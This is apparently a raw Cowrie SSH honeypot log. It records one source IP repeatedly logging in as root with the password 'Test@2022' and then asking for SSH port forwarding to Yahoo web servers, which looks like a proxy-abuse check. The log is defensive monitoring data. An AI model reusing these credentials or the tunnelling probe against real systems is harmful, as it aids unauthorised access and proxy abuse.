{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:53.980248Z","src_ip":"27.112.78.170","session":"3cefaa9f38b9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:54.002169Z","src_ip":"213.209.150.239","session":"bc9c6befb5b3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:54.284785Z","src_ip":"213.209.150.239","session":"bc9c6befb5b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":18489,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:18489","sensor":"my-vps","timestamp":"2025-08-26T01:03:54.343519Z","session":"bc9c6befb5b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:54.400303Z","src_ip":"213.209.150.239","session":"bc9c6befb5b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":27277,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:27277","sensor":"my-vps","timestamp":"2025-08-26T01:03:54.555309Z","session":"bc9c6befb5b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:54.612493Z","src_ip":"213.209.150.239","session":"bc9c6befb5b3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:54.669975Z","src_ip":"213.209.150.239","session":"bc9c6befb5b3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29033,"dst_ip":"1.2.3.4","dst_port":22,"session":"dba30f5bb4eb","protocol":"ssh","message":"New connection: 213.209.150.239:29033 (1.2.3.4:22) [session: dba30f5bb4eb]","sensor":"my-vps","timestamp":"2025-08-26T01:03:54.725601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:54.726585Z","src_ip":"213.209.150.239","session":"dba30f5bb4eb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:54.783214Z","src_ip":"213.209.150.239","session":"dba30f5bb4eb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:55.065851Z","src_ip":"213.209.150.239","session":"dba30f5bb4eb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":11233,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:11233","sensor":"my-vps","timestamp":"2025-08-26T01:03:55.123675Z","session":"dba30f5bb4eb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:55.180509Z","src_ip":"213.209.150.239","session":"dba30f5bb4eb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":29583,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:29583","sensor":"my-vps","timestamp":"2025-08-26T01:03:55.334955Z","session":"dba30f5bb4eb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:55.391510Z","src_ip":"213.209.150.239","session":"dba30f5bb4eb"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:55.449127Z","src_ip":"213.209.150.239","session":"dba30f5bb4eb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29084,"dst_ip":"1.2.3.4","dst_port":22,"session":"566e5fde42c7","protocol":"ssh","message":"New connection: 213.209.150.239:29084 (1.2.3.4:22) [session: 566e5fde42c7]","sensor":"my-vps","timestamp":"2025-08-26T01:03:55.505029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:55.505631Z","src_ip":"213.209.150.239","session":"566e5fde42c7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:55.562140Z","src_ip":"213.209.150.239","session":"566e5fde42c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:55.843452Z","src_ip":"213.209.150.239","session":"566e5fde42c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":17081,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:17081","sensor":"my-vps","timestamp":"2025-08-26T01:03:55.900783Z","session":"566e5fde42c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:55.957584Z","src_ip":"213.209.150.239","session":"566e5fde42c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":6696,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:6696","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.110820Z","session":"566e5fde42c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.167339Z","src_ip":"213.209.150.239","session":"566e5fde42c7"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.224818Z","src_ip":"213.209.150.239","session":"566e5fde42c7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29143,"dst_ip":"1.2.3.4","dst_port":22,"session":"cae3e2b7da2c","protocol":"ssh","message":"New connection: 213.209.150.239:29143 (1.2.3.4:22) [session: cae3e2b7da2c]","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.270998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.271829Z","src_ip":"213.209.150.239","session":"cae3e2b7da2c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.318861Z","src_ip":"213.209.150.239","session":"cae3e2b7da2c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.554062Z","src_ip":"213.209.150.239","session":"cae3e2b7da2c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":19479,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:19479","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.602854Z","session":"cae3e2b7da2c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.650294Z","src_ip":"213.209.150.239","session":"cae3e2b7da2c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":387,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:387","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.785587Z","session":"cae3e2b7da2c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.832765Z","src_ip":"213.209.150.239","session":"cae3e2b7da2c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.880935Z","src_ip":"213.209.150.239","session":"cae3e2b7da2c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29180,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2ac28634e10","protocol":"ssh","message":"New connection: 213.209.150.239:29180 (1.2.3.4:22) [session: a2ac28634e10]","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.936631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.937272Z","src_ip":"213.209.150.239","session":"a2ac28634e10"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:56.994144Z","src_ip":"213.209.150.239","session":"a2ac28634e10"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:57.277724Z","src_ip":"213.209.150.239","session":"a2ac28634e10"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":13995,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:13995","sensor":"my-vps","timestamp":"2025-08-26T01:03:57.335660Z","session":"a2ac28634e10"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:57.392470Z","src_ip":"213.209.150.239","session":"a2ac28634e10"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":20712,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:20712","sensor":"my-vps","timestamp":"2025-08-26T01:03:57.547610Z","session":"a2ac28634e10"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:57.604283Z","src_ip":"213.209.150.239","session":"a2ac28634e10"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:57.661615Z","src_ip":"213.209.150.239","session":"a2ac28634e10"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":29248,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e721e97c682","protocol":"ssh","message":"New connection: 213.209.150.239:29248 (1.2.3.4:22) [session: 6e721e97c682]","sensor":"my-vps","timestamp":"2025-08-26T01:03:57.717412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:57.718138Z","src_ip":"213.209.150.239","session":"6e721e97c682"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.co